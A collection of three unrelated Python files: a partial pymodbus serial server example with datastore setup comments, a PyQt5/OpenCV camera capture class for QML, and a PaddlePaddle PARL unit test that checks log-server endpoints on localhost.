log = logging.getLogger("ModbusServer")
serialPort = readlink('/tmp/pts1')
def _start_rtu_server(self, framer=ModbusRtuFramer):
# @req an open and existing /tmp/pts0 is required
#---------------------------------------------------------------------------#
# initialize your data store
#---------------------------------------------------------------------------#
# The datastores only respond to the addresses that they are initialized to.
# Therefore, if you initialize a DataBlock to addresses from 0x00 to 0xFF, a
# request to 0x100 will respond with an invalid address exception. This is
# because many devices exhibit this kind of behavior (but not all)::
#
# block = ModbusSequentialDataBlock(0x00, [0]*0xff)
#
# Continuing, you can choose to use a sequential or a sparse DataBlock in
# your data context. The difference is that the sequential has no gaps in
# the data while the sparse can. Once again, there are devices that exhibit
# both forms of behavior::
#
# block = ModbusSparseDataBlock({0x00: 0, 0x05: 1})
# block = ModbusSequentialDataBlock(0x00, [0]*5)
#
# Alternately, you can use the factory methods to initialize the DataBlocks
# or simply do not pass them to have them initialized to 0x00 on the full
# address range::
#
# store = ModbusSlaveContext(di = ModbusSequentialDataBlock.create())
# store = ModbusSlaveContext()
#
# Finally, you are allowed to use the same DataBlock reference for every
# table, or you may use a separate DataBlock for each table. This depends on
# whether you would like functions to be able to access and modify the same
# data or not::
#
# block = ModbusSequentialDataBlock(0x00, [0]*0xff)
# store = ModbusSlaveContext(di=block, co=block, hr=block, ir=block)
#
# The server then makes use of a server context that allows the server to
# respond with different slave contexts for different unit ids. By default
# it will return the same context for every unit id supplied (broadcast
# mode). However, this can be overloaded by setting the single flag to False
# and then supplying a dictionary of unit id to context mapping::
#
# slaves = {
# 0x01: ModbusSlaveContext(...),
# 0x02: ModbusSlaveContext(...),
# 0x03: ModbusSlaveContext(...),
# }
# context = ModbusServerContext(slaves=slaves, single=False)
#
# The slave context can also be initialized in zero_mode which means that a
# request to address(0-7) will map to the address (0-7). The default is
# False which is based on section 4.4 of the specification, so address(0-7)
# will map to (1-8)::
#
# store = ModbusSlaveContext(..., zero_mode=True)
#---------------------------------------------------------------------------#
store = ModbusSlaveContext(
di = ModbusSequentialDataBlock(0, [True]*8), # discrete inputs
co = ModbusSequentialDataBlock(0, [False]*8), # coils
hr = ModbusSequentialDataBlock(0, [0]*8), # holding regs
ir = ModbusSequentialDataBlock(0, list(range(8))), # input regs
zero_mode=True) # request(0-7) will map to the address (0-7)
context = ModbusServerContext(slaves=store, single=True)
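# For reference, a minimal illustrative sketch (not used by this example) of
# the multi-unit setup described above, mapping explicit unit ids to their own
# slave contexts instead of broadcasting a single one; the unit ids and block
# sizes here are assumptions:
#
#   slaves = {
#       0x01: ModbusSlaveContext(hr=ModbusSequentialDataBlock(0, [0]*8)),
#       0x02: ModbusSlaveContext(hr=ModbusSequentialDataBlock(0, [0]*8)),
#   }
#   context = ModbusServerContext(slaves=slaves, single=False)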
#---------------------------------------------------------------------------#
# initialize the server information
#---------------------------------------------------------------------------#
# If you don't set this or any fields, they are defaulted to empty strings.
#---------------------------------------------------------------------------#
identity = ModbusDeviceIdentification()
identity.VendorName = 'Pymodbus'
identity.ProductCode = 'PM'
identity.VendorUrl = 'http://github.com/bashwork/pymodbus/'
identity.ProductName = 'Pymodbus Server'
identity.ModelName = 'Pymodbus Server'
identity.MajorMinorRevision = '1.0'
#---------------------------------------------------------------------------#
# run the server you want
#---------------------------------------------------------------------------#
#StartTcpServer(context, identity=identity, address=("localhost", 5020))
#StartUdpServer(context, identity=identity, address=("localhost", 502))
StartSerialServer(context, identity=identity, port=self.serialPort, baudrate=19200, framer=framer)
#StartSerialServer(context, identity=identity, port='/dev/pts/3', framer=ModbusAsciiFramer)
p = None
def start(self):
from multiprocessing import Process
self.p = Process(target=self._start_rtu_server) #args=('bob',)
self.p.daemon = True
self.p.start()
print("p.start done")
def kill(self):
self.log.info("Going to terminate the process, this could throw exceptions")
if self.p is not None:
self.p.terminate()
if __name__ == '__main__':
mbs = ModbusSerialServer()
mbs._start_rtu_server()
#mbs.start()
#import time
#time.sleep(3600)
#mbs.kill()
|
cvcapture.py
|
import numpy as np
import threading
import cv2
from PyQt5 import QtCore, QtGui, QtQml
gray_color_table = [QtGui.qRgb(i, i, i) for i in range(256)]
class CVAbstractFilter(QtCore.QObject):
def process_image(self, src):
dst = src
return dst
class CVCapture(QtCore.QObject):
started = QtCore.pyqtSignal()
imageReady = QtCore.pyqtSignal()
indexChanged = QtCore.pyqtSignal()
def __init__(self, parent=None):
super(CVCapture, self).__init__(parent)
self._image = QtGui.QImage()
self._index = 0
self.m_videoCapture = cv2.VideoCapture()
self.m_timer = QtCore.QBasicTimer()
self.m_filters = []
self.m_busy = False
@QtCore.pyqtSlot()
@QtCore.pyqtSlot(int)
def start(self, *args):
if args:
self.setIndex(args[0])
self.m_videoCapture.release()
self.m_videoCapture = cv2.VideoCapture(self._index)
if self.m_videoCapture.isOpened():
self.m_timer.start(0, self)
self.started.emit()
@QtCore.pyqtSlot()
def stop(self):
self.m_timer.stop()
def timerEvent(self, e):
if e.timerId() != self.m_timer.timerId(): return
ret, frame = self.m_videoCapture.read()
if not ret:
self.m_timer.stop()
return
if not self.m_busy:
threading.Thread(target=self.process_image, args=(np.copy(frame),)).start()
@QtCore.pyqtSlot(np.ndarray)
def process_image(self, frame):
self.m_busy = True
for f in self.m_filters:
frame = f.process_image(frame)
image = CVCapture.ToQImage(frame)
self.m_busy = False
QtCore.QMetaObject.invokeMethod(self,
"setImage",
QtCore.Qt.QueuedConnection,
QtCore.Q_ARG(QtGui.QImage, image))
@staticmethod
def ToQImage(im):
if im is None:
return QtGui.QImage()
if im.dtype == np.uint8:
if len(im.shape) == 2:
qim = QtGui.QImage(im.data, im.shape[1], im.shape[0], im.strides[0], QtGui.QImage.Format_Indexed8)
qim.setColorTable(gray_color_table)
return qim.copy()
elif len(im.shape) == 3:
if im.shape[2] == 3:
height, width, _ = im.shape  # numpy shape is (rows, cols, channels)
rgb_image = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
flip_image = cv2.flip(rgb_image, 1)
qim = QtGui.QImage(flip_image.data, width, height, flip_image.strides[0], QtGui.QImage.Format_RGB888)
return qim.copy()
return QtGui.QImage()
def image(self):
return self._image
@QtCore.pyqtSlot(QtGui.QImage)
def setImage(self, image):
if self._image == image: return
self._image = image
self.imageReady.emit()
def index(self):
return self._index
def setIndex(self, index):
if self._index == index: return
self._index = index
self.indexChanged.emit()
@QtCore.pyqtProperty(QtQml.QQmlListProperty)
def filters(self):
return QtQml.QQmlListProperty(CVAbstractFilter, self, self.m_filters)
image = QtCore.pyqtProperty(QtGui.QImage, fget=image, notify=imageReady)
index = QtCore.pyqtProperty(int, fget=index, fset=setIndex, notify=indexChanged)
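# A minimal, hypothetical usage sketch (not part of the original snippet):
# registering the types for QML. The module name/version and main.qml are
# assumptions.
#
#   if __name__ == '__main__':
#       import sys
#       QtQml.qmlRegisterType(CVCapture, "OpenCV", 1, 0, "CVCapture")
#       QtQml.qmlRegisterType(CVAbstractFilter, "OpenCV", 1, 0, "CVAbstractFilter")
#       app = QtGui.QGuiApplication(sys.argv)
#       engine = QtQml.QQmlApplicationEngine()
#       engine.load(QtCore.QUrl.fromLocalFile("main.qml"))
#       sys.exit(app.exec_())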
|
log_server_test.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import multiprocessing
import os
import pickle
import subprocess
import sys
import tempfile
import threading
import time
import unittest
import requests
requests.adapters.DEFAULT_RETRIES = 5
import parl
from parl.remote.client import disconnect, get_global_client
from parl.remote.master import Master
from parl.remote.worker import Worker
from parl.utils import _IS_WINDOWS
@parl.remote_class
class Actor(object):
def __init__(self, number=None, arg1=None, arg2=None):
self.number = number
self.arg1 = arg1
self.arg2 = arg2
print("Init actor...")
self.init_output = "Init actor...\n"
def sim_output(self, start, end):
output = ""
print(self.number)
output += str(self.number)
output += "\n"
for i in range(start, end):
print(i)
output += str(i)
output += "\n"
return self.init_output + output
class TestLogServer(unittest.TestCase):
def tearDown(self):
disconnect()
# On Windows, multiprocessing.Process cannot run an instance method of a class, but a static method is OK.
@staticmethod
def _connect_and_create_actor(cluster_addr):
parl.connect(cluster_addr)
outputs = []
for i in range(2):
actor = Actor(number=i)
ret = actor.sim_output(1, 4)
assert ret != ""
outputs.append(ret)
return outputs
def test_log_server(self):
master_port = 8401
# start the master
master = Master(port=master_port)
th = threading.Thread(target=master.run)
th.start()
time.sleep(1)
cluster_addr = 'localhost:{}'.format(master_port)
log_server_port = 8402
worker = Worker(cluster_addr, 4, log_server_port=log_server_port)
outputs = self._connect_and_create_actor(cluster_addr)
# Get status
status = master._get_status()
client_jobs = pickle.loads(status).get('client_jobs')
self.assertIsNotNone(client_jobs)
# Get job id
client = get_global_client()
jobs = client_jobs.get(client.client_id)
self.assertIsNotNone(jobs)
for job_id, log_server_addr in jobs.items():
log_url = "http://{}/get-log".format(log_server_addr)
# Test response without job_id
r = requests.get(log_url)
self.assertEqual(r.status_code, 400)
# Test normal response
r = requests.get(log_url, params={'job_id': job_id})
self.assertEqual(r.status_code, 200)
log_content = json.loads(r.text).get('log')
self.assertIsNotNone(log_content)
log_content = log_content.replace('\r\n', '\n')
self.assertIn(log_content, outputs)
# Test download
download_url = "http://{}/download-log".format(log_server_addr)
r = requests.get(download_url, params={'job_id': job_id})
self.assertEqual(r.status_code, 200)
log_content = r.text.replace('\r\n', '\n')
self.assertIn(log_content, outputs)
disconnect()
worker.exit()
master.exit()
def test_monitor_query_log_server(self):
master_port = 8403
monitor_port = 8404
# start the master
master = Master(port=master_port, monitor_port=monitor_port)
th = threading.Thread(target=master.run)
th.start()
time.sleep(1)
# start the cluster monitor
monitor_file = __file__.replace('log_server_test.pyc', '../monitor.py')
monitor_file = monitor_file.replace('log_server_test.py',
'../monitor.py')
command = [
sys.executable, monitor_file, "--monitor_port",
str(monitor_port), "--address", "localhost:" + str(master_port)
]
if _IS_WINDOWS:
FNULL = tempfile.TemporaryFile()
else:
FNULL = open(os.devnull, 'w')
monitor_proc = subprocess.Popen(
command,
stdout=FNULL,
stderr=subprocess.STDOUT,
)
# Start worker
cluster_addr = 'localhost:{}'.format(master_port)
log_server_port = 8405
worker = Worker(cluster_addr, 4, log_server_port=log_server_port)
# Test monitor API
outputs = self._connect_and_create_actor(cluster_addr)
time.sleep(5) # Wait for the status update
client = get_global_client()
jobs_url = "{}/get-jobs?client_id={}".format(master.monitor_url,
client.client_id)
r = requests.get(jobs_url)
self.assertEqual(r.status_code, 200)
data = json.loads(r.text)
for job in data:
log_url = job.get('log_url')
self.assertIsNotNone(log_url)
r = requests.get(log_url)
self.assertEqual(r.status_code, 200)
log_content = json.loads(r.text).get('log')
self.assertIsNotNone(log_content)
log_content = log_content.replace('\r\n', '\n')
self.assertIn(log_content, outputs)
# Test download
download_url = job.get('download_url')
r = requests.get(download_url)
self.assertEqual(r.status_code, 200)
log_content = r.text.replace('\r\n', '\n')
self.assertIn(log_content, outputs)
# Clean context
monitor_proc.kill()
monitor_proc.wait()
disconnect()
worker.exit()
master.exit()
if __name__ == '__main__':
unittest.main()
|